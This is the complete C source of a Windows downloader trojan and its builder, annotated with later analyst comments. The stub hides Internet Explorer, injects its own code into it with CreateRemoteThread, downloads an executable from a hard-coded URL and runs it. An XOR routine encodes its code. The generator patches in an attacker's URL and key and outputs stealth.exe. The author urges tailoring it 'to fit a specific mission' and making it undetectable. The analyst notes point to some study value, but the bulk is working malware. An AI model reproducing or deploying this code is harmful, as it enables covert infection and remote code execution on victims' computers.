3K下载者.txt

/*
  "mini_downloader"
  code by kardinal p.s.t
  Edited by stealthwalker
  compiled with vc++ 6.0
  cannot run under win98;
*/
#include <windows.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

#pragma comment(linker, "/OPT:NOWIN98")   //shrink the EXE to about 2.5 KB
#pragma comment(linker, "/merge:.data=.text")  
#pragma comment(linker, "/merge:.rdata=.text")  
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")  
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
  
  // Analyst note: the three Win32 APIs below are not linked statically; they are
  // resolved by name with GetProcAddress in download() and main(), so they do
  // not show up as ordinary imports of the stub.
  HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
  DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
  HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);   //create remote thread,and run
  HANDLE processhandle;   // handle to the target IE process, opened in main()
  DWORD pid;              // process id behind the IE window found in main()
  HINSTANCE hshell,hurlmon,hkernel;   // module handles returned by LoadLibrary

// Thread routine that main() copies into the Internet Explorer process and
// starts there with CreateRemoteThread. Inside IE it resolves ShellExecuteA
// and URLDownloadToFileA by name, fetches the hard-coded URL to the fixed
// local path "c://ieinst12.exe", launches that file, and then terminates the
// hosting process.
// Analyst note: the URL and the drop path are this sample's main indicators.
// The builder (MakeDlExe) overwrites a 76-byte URL at a fixed offset in the
// compiled stub, presumably this string, so the literal here is a placeholder.
void download() //thread function to be injected to IE
{
  hshell=LoadLibrary("Shell32.dll");
  hurlmon=LoadLibrary("urlmon.dll");

  (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
  (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

  // Download to a fixed path on C: and open it (nShowCmd 5, i.e. SW_SHOW).
  DOWNFILE(NULL," http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);  
  SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
  // Because this runs inside IE, ExitProcess ends the IE process, not the dropper.
  ExitProcess(0);
};
  

// Dropper body, called from decrpt() once the code bytes have been decoded.
// Starts a hidden Internet Explorer, copies this process's whole image into
// it at the same base address, and runs download() there as a remote thread.
// Analyst note: WinExec of IEXPLORE.EXE with SW_HIDE followed by OpenProcess /
// VirtualAllocEx / WriteProcessMemory / CreateRemoteThread against that
// process is the sequence to look for in process-creation and API telemetry;
// in this code the network download itself happens from inside IE.
void main() //main function
{  
  //1.get IE path ,and run it
  // Takes the first three characters of the Windows directory (the drive,
  // e.g. "C:\") and appends a fixed IE path; IE is started hidden.
  char iename[MAX_PATH],iepath[MAX_PATH];
  ZeroMemory(iename,sizeof(iename));
  ZeroMemory(iepath,sizeof(iepath));

  GetWindowsDirectory(iepath,MAX_PATH);
  strncpy(iename,iepath,3);
  strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
  WinExec(iename,SW_HIDE);
  Sleep(500);

  //2.get IE process handle
  // Finds IE through its top-level window class and opens it with full access.
  HWND htemp;
  htemp=FindWindow("IEFrame",NULL);
  GetWindowThreadProcessId(htemp,&pid);
  processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
  
  //3.allocate memory
  HMODULE Module;
  LPVOID NewModule;
  DWORD Size;
  LPDWORD lpimagesize;

  Module = GetModuleHandle(NULL);//image base address
  //image size: reads e_lfanew at [base+0x3c], then the SizeOfImage field at
  //[NT headers+0x50] from this process's own PE header.
  _asm
  {
    push eax;
    push ebx;
    mov ebx,Module;
    mov eax,[ebx+0x3c];
    lea eax,[ebx+eax+0x50];  
    mov eax,[eax]
    mov lpimagesize,eax;
    pop ebx;
    pop eax;
  };
  Size=(DWORD)lpimagesize;
  // Requests the same address range inside IE, so that code addresses taken
  // in this process remain valid in the target; the /BASE pragma above pins
  // the image base, presumably so this request can be satisfied.
  NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//determine the start base and the position of the image base

  //4.write to memory,create thread
  WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
  LPTHREAD_START_ROUTINE entrypoint;
  // Address of download() in this process; because the image was copied to
  // the same base, the same address is used as the remote thread start.
  __asm
  {
    push eax;
    lea eax,download;
    mov entrypoint,eax;
    pop eax
  }
  hkernel=LoadLibrary("KERNEL32.dll");
  (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
  MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL);   //create remote thread and run

  //5.clean
  CloseHandle(processhandle);
  return;
};

//decryption function
//decryption function
// Program entry point (see the "/ENTRY:decrpt" linker pragma above). The bytes
// of download() and main() are stored XOR-encoded in the binary; this routine
// decodes them in place and then calls main().
// Analyst note: the key is the immediate 0x2c in the second asm block. The
// builder (MakeDlExe) writes a user-chosen key byte into the stub at a fixed
// offset, presumably patching that immediate, so samples produced by the
// generator differ only in the URL string and the key byte.
void decrpt()
{

  HANDLE myps;
  DWORD oldAttr;
  BYTE shellcode[500];   // temporary copy of the encoded code bytes
  ZeroMemory(shellcode,sizeof(shellcode));
  myps=GetCurrentProcess();
  // Makes the page(s) holding download() writable so the code can be patched.
  ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
  //store the original data to shellcode
  // Copies the byte range [download, decrpt) into the stack buffer; this
  // assumes the linker places download() and main() contiguously before
  // decrpt() in the image.
  _asm
  {
    pushad;
    lea esi,download;
    lea edi,shellcode;
    lea ecx,decrpt;
    sub ecx,esi;
    rep movsb;
    popad;

  };

  //decrypt
  // XORs each byte of the saved copy with 0x2c and writes it back over the
  // original code; ecx = decrpt - download is the byte count.
  //int i;
  //for (i=1;i<=0xFF;i++)
  //{
  _asm
  {
    pushad;
    lea esi,shellcode;
    lea edi,download;
    lea ecx,decrpt;
    sub ecx,edi;
en2:  
    lodsb;
    mov edx,0x2c;
    xor al,dl;
    stosb;
    dec ecx;
    jne en2;
    popad;

  };//end asm
  // Runs the decoded main(); any exception is swallowed by the empty handler,
  // so a failed decode ends the process silently.
  __try
  {
  main();
  //MessageBox(NULL,"ok","ok",MB_OK);
  return;
  }
  __except(EXCEPTION_EXECUTE_HANDLER)

  {
  //   OutputDebugString("ERRor hehe");
  //   MessageBox(NULL,"error","a",MB_OK);
  };
  

  //}// end for i
  return;
};


I modified some snippets of it, especially the decrypt function: I removed the for loop so that it XORs only once. I think you can do many things to customize the code to fit a specific mission; for example, you can use shellcoding methods to add a decode block in front of the encoded data so that it works properly, or randomly encrypt any block of the main code to make it undetectable.
Pay attention: the code above cannot be launched as a stand-alone program. In other words, you must encrypt the download() and main() functions manually before it is launched. To make this easy, I coded a SIMPLE program — a generator — in C.

CODE:

#include <windows.h>
#include <stdio.h>


#include "resource.h"
HWND hDlg;           // main dialog handle, set on WM_INITDIALOG
char url[76];        // download URL read from IDC_EDIT1; copied verbatim into the stub
char key[3];         // two hex characters read from IDC_EDIT2, plus terminator
unsigned char nkey;  // key byte decoded from key[] by String2Bytes

//convert string to bytes,borrowed from the internet
//convert string to bytes,borrowed from the internet
// Decodes a hex string into raw bytes, two input characters per output byte.
// pSrc: hex text; pDst: destination, at least nSrcLength / 2 bytes;
// nSrcLength: number of source characters (even).
// Returns the number of bytes written, nSrcLength / 2.
// Only '0'-'9' and 'A'-'F' are decoded; any other character takes the 'A'-'F'
// branch without validation.
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
for(int i=0; i<nSrcLength; i+=2)
{

// high nibble
if(*pSrc>='0' && *pSrc<='9')
{
*pDst = (*pSrc - '0') << 4;
}
else
{
*pDst = (*pSrc - 'A' + 10) << 4;
}

pSrc++;


// low nibble
if(*pSrc>='0' && *pSrc<='9')
{
*pDst |= *pSrc - '0';
}
else
{
*pDst |= *pSrc - 'A' + 10;
}
pSrc++;
pDst++;
}

return nSrcLength / 2;
}

// Validates the global key[]: both characters must be lowercase hex digits
// ('0'-'9' or 'a'-'f'), and the values "00" and "ff" are rejected.
// Returns true when the key is accepted, false otherwise.
BOOL CheckKey(void)
{
  if(((key[0]>='0' && key[0]<='9')||(key[0]>='a' && key[0]<='f'))&&((key[1]>='0' && key[1]<='9')||(key[1]>='a' &&

key[1]<='f')))
  {    
    if((key[0]=='0' && key[1]=='0')||(key[0]=='f' && key[1]=='f'))
          return false;
        else
          return true;
  }
  else
  return false;
}

// Builds the customized stub: loads the embedded "SERVER" resource, patches the
// URL and key byte into it at fixed file offsets, XOR-encodes a fixed byte
// range with the key, and writes the result to "stealth.exe" in the current
// directory. Reads the globals url, key and hDlg.
// Analyst note: the offsets 0x258 (URL, 76 bytes), 0x5d7 (key byte) and the
// encoded range [0x360, 0x550) are hard-coded, so this generator is tied to
// one specific build of the stub; the output file name is always stealth.exe.
void WINAPI MakeDlExe(void)
{
  HRSRC hResInfo;
  HGLOBAL hResData;
  DWORD dwSize, dwWritten;
  LPBYTE p;
  HANDLE hFile;

  hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
  if (NULL == hResInfo)
{
  MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
  return;
  }

  dwSize = SizeofResource(NULL, hResInfo);
  // Load Resource
  hResData = LoadResource(NULL, hResInfo);
  if (NULL == hResData)
  {
  MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
  return;
  }
  // Allocate Memory
  p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
  if (p == NULL)
  {
  MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
  return;
  }
  //duplicate resource data
  CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
  //TO customize the resource data
  // key text -> key byte, then patch URL and key into the copied image.
  String2Bytes(key,&nkey,2);
  CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
  CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
  //for (i=1;i<0xff;i++)
  //{
  // XOR bytes [0x360, 0x550) of the image in place with the key byte; this is
  // presumably the region that the stub's decrpt() decodes at run time.
  _asm{
        push p
        pop esi
        add esi,0x360
        push esi
        pop edi
        mov ecx,0x550
        sub ecx,0x360
        mov bl,nkey
loop1:
        lodsb
        xor al,bl
        stosb
        dec ecx
        jne loop1
    }
//   }
  //store the customized data to file
  hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
  if (hFile != NULL)
  {
  WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
  MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
  }
  else
  {
  MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
  GlobalFree((HGLOBAL)p);
  }
  // release resources
  CloseHandle(hFile);
  GlobalFree((HGLOBAL)p);
}
// Dialog procedure for the generator window (IDD_DIALOG1).
// hwndDlg: the dialog; uMsg/wParam/lParam: the usual window-message triple.
// Always returns 0. Stores the dialog handle in the global hDlg, fills in the
// default URL and key, and on IDC_BUTTON1 reads the user's values into the
// globals url/key, validates the key with CheckKey() and calls MakeDlExe().
// Analyst note: the defaults "http://www.r00tme.net/test.exe" and key "2e"
// are the values a sample built without edits would carry.
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    
switch (uMsg)
{
  case WM_INITDIALOG:
    hDlg = hwndDlg;
    LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
    SetDlgItemText(hDlg,IDC_EDIT1," http://www.r00tme.net/test.exe");
    SetDlgItemText(hDlg,IDC_EDIT2,"2e");
    // Input limits match the 76-byte URL slot and the two-character key.
    SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
    SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
    break;

  case WM_CLOSE:
          EndDialog(hDlg, 0);
        break;
  case WM_DESTROY:
      PostQuitMessage(0);
      break;
  case WM_COMMAND:
    // "Build" button: read URL and key from the edit controls, then build.
    if (LOWORD(wParam) == IDC_BUTTON1)
    {
      ZeroMemory(url,MAX_PATH);
      GetDlgItemText(hDlg,IDC_EDIT1,url,76);
      GetDlgItemText(hDlg,IDC_EDIT2,key,3);
      if(CheckKey())
          MakeDlExe();
      else
        MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
    
    }
    // "Exit" button.
    if (LOWORD(wParam) == IDC_BUTTON2)
    {
      EndDialog(hDlg, 0);
      }
      break;
}
return 0;
}

// Process entry point of the generator: shows IDD_DIALOG1 modally with
// DialogProc as its procedure and returns 0 when the dialog is closed.
// hPrevInstance, lpCmdLine and nCmdShow are unused.
int WINAPI WinMain(HINSTANCE hInstance,
              HINSTANCE hPrevInstance,
              LPSTR   lpCmdLine,
              int     nCmdShow)
{
  // TODO: Place code here.
  DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
  return 0;
}



the resource .h file:

CODE:

//{{NO_DEPENDENCIES}}
//  Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1               101
#define IDI_ICON1               102
#define IDR_SERVER1               103
#define IDC_EDIT1               1000
#define IDC_BUTTON1               1001
#define IDC_BUTTON2               1002
#define IDC_EDIT2               1003

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE     108
#define _APS_NEXT_COMMAND_VALUE       40001
#define _APS_NEXT_CONTROL_VALUE       1004
#define _APS_NEXT_SYMED_VALUE       101
#endif
#endif 